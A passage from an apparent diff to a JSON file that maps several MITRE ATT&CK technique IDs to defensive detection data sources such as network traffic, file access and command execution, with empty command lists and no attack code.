This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1001.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1001.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1001.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1132.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1090.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
